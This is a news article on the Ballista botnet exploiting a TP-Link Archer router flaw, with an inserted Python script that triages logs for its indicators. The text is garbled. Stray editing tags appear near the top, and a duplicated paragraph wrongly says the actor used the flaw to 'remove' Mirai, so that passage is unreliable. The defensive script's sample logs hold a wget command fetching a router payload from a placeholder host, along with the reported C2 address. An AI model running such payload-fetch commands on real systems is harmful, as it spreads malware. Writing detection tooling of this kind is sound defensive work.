Ballista Botnet Exploits Patched TP-Link Vulnerability Infects Over 6,000 Devices


March 11, 2025Ravi LakshmananNetwork Security/Vulnerabilities

New research from the Cato CTRL team shows that unpatched TP-Link Archer routers are the target of a new botnet campaign called Ballista.

“The botnet spreads automatically across the Internet by leveraging a remote code execution (RCE) vulnerability in TP-Link Archer routers (CVE-2023-1389),” the security researchers said in a technical report shared with The Hacker News.

CVE-2023-1389 is a high-severity security flaw affecting TP-Link Archer AX-21 routers that allows command injection and can pave the way for remote code execution.
</gml_replace>
<gr_replace lines="58" cat="clarify" orig="The earliest">
The earliest evidence of active exploitation of the flaw dates back to April 2023, when an unidentified threat actor used it to drop the Mirai botnet malware. Since then, it has been abused to propagate other malware families such as Condi and Androxgh0st.

The earliest evidence of the aggressive exploitation of the flaw dates back to April 2023, when an unidentified threat actor uses it to remove the Mirai Botnet malware. Since then, it has been abused to propagate other malware families such as Condi and Androxgh0st.

Cato CTRL said it detected the Ballista campaign on January 10, 2025. The most recent exploitation attempts were recorded on February 17.

The attack sequence involves the use of a malware dropper, a shell script (“Dropbpb.sh”) designed to retrieve and execute the main binary on the target system for various architectures, such as MIPS, mipsel, armv5l, armv7l and x86_64.

When executed, the malware establishes an encrypted Command and Control (C2) channel on port 82 to control the device.

“This allows it to run shell commands to carry out additional RCE and denial-of-service (DoS) attacks,” the researchers said. “In addition, the malware attempts to read sensitive files on the local system.”

Some of the supported commands are listed below:

  • flooder, which triggers a flood attack
  • exploiter, which exploits CVE-2023-1389
  • start, an optional parameter used with exploiter to start the module
  • a stop command, which halts the module's trigger function
  • shell, which executes Linux shell commands on the local system
  • killall, which is used to terminate the service

Additionally, it can terminate previous instances of itself and erase traces of its own presence when execution begins. It is also designed to spread to other routers by attempting to exploit the same flaw.

The location of the C2 IP address (2.237.57[.]70) and the presence of Italian-language strings in the malware binaries suggest the involvement of an unknown Italian threat actor, the cybersecurity company said.

That said, given that the IP address is no longer active and that newer dropper variants use Tor network domains instead of a hard-coded IP address, the malware appears to be under active development.
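The indicators in the preceding paragraphs (an encrypted C2 channel on TCP port 82, the reported C2 address, the “Dropbpb.sh” dropper name, and the per-architecture payload fetch) lend themselves to a simple triage pass over router-adjacent logs. The script below is an added example written for this page, not code from Cato CTRL or the original article; the log format, the field names and the sample log lines are constructed for illustration, and the architecture-download heuristic is an assumption about how the dropper's fetch would appear in a process log, not something the article states.

```python
"""Triage constructed flow and process log lines for Ballista-style indicators.

Indicators taken from the article: outbound TCP/82 C2 channel, the C2 address
2.237.57[.]70 (reported as no longer active), and the dropper name Dropbpb.sh.
Everything else (log format, sample lines, download heuristic) is constructed.
"""
import re
from dataclasses import dataclass

C2_PORT = 82                                   # C2 channel port, per the article
C2_IPS = {"2.237.57.70"}                       # defanged in the article; re-fanged for matching
DROPPER_NAMES = {"dropbpb.sh"}                 # dropper script name, per the article
# Architectures the dropper fetches payloads for, per the article (assumed to
# appear as a path component in a wget/curl command line).
ARCH_RE = re.compile(r"/(mips|mipsel|armv5l|armv7l|x86_64)\b")

# Constructed log formats: one line per network flow, one line per process start.
FLOW_RE = re.compile(
    r"^(?P<ts>\S+) flow src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) proto=(?P<proto>\w+)$"
)
PROC_RE = re.compile(r"^(?P<ts>\S+) proc host=(?P<host>[\d.]+) cmd=(?P<cmd>.+)$")


@dataclass
class Finding:
    host: str    # internal address the indicator was observed on
    reason: str  # which indicator fired
    line: str    # the raw log line, for the analyst's follow-up


def analyze(lines):
    """Return one Finding per log line that matches a Ballista indicator."""
    findings = []
    for raw in lines:
        line = raw.strip()
        m = FLOW_RE.match(line)
        if m:
            src, dst, dport = m["src"], m["dst"], int(m["dport"])
            if dst in C2_IPS:
                findings.append(Finding(src, f"connection to known Ballista C2 address {dst}", line))
            elif dport == C2_PORT and m["proto"].lower() == "tcp":
                findings.append(Finding(src, "outbound TCP/82 (possible C2 channel)", line))
            continue
        m = PROC_RE.match(line)
        if m:
            cmd = m["cmd"].lower()
            if any(name in cmd for name in DROPPER_NAMES):
                findings.append(Finding(m["host"], "dropper script name observed", line))
            elif ("wget" in cmd or "curl" in cmd) and ARCH_RE.search(cmd):
                findings.append(Finding(m["host"], "download of per-architecture payload (heuristic)", line))
    return findings


def suspicious_hosts(lines):
    """Sorted, de-duplicated list of hosts with at least one finding."""
    return sorted({f.host for f in analyze(lines)})


# Constructed sample input: two flows worth flagging, one benign flow, a dropper
# execution, a follow-on payload fetch, and a benign process start.
SAMPLE_LOGS = [
    "2025-01-10T03:12:01Z flow src=192.0.2.10:41022 dst=2.237.57.70:82 proto=tcp",
    "2025-01-10T03:12:05Z flow src=192.0.2.11:55010 dst=198.51.100.5:82 proto=tcp",
    "2025-01-10T03:12:07Z flow src=192.0.2.12:44000 dst=203.0.113.9:443 proto=tcp",
    "2025-01-10T03:13:00Z proc host=192.0.2.13 cmd=sh /tmp/Dropbpb.sh",
    "2025-01-10T03:13:04Z proc host=192.0.2.13 cmd=wget http://203.0.113.77/bin/armv7l -O /tmp/a",
    "2025-01-10T03:14:00Z proc host=192.0.2.14 cmd=ls /etc",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.host}: {f.reason}")
    print("hosts to review:", suspicious_hosts(SAMPLE_LOGS))
```

The port-82 rule is deliberately kept separate from the address match: the article notes the listed IP is already inactive and that newer droppers switch to Tor-based addressing, so a static address list ages quickly, while an unexpected outbound TCP/82 session from a consumer router remains a useful, if noisier, signal to review.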

A search on the Censys attack surface management platform revealed that Ballista has infected over 6,000 devices. Infections are concentrated in Brazil, Poland, the UK, Bulgaria and Türkiye.

The botnet is known to target manufacturing, healthcare, services and technology organizations in the United States, Australia, China and Mexico.

“The malware sample shares similarities with other botnets, but it’s different from widely used botnets like Mirai and Mozi,” the researchers said.
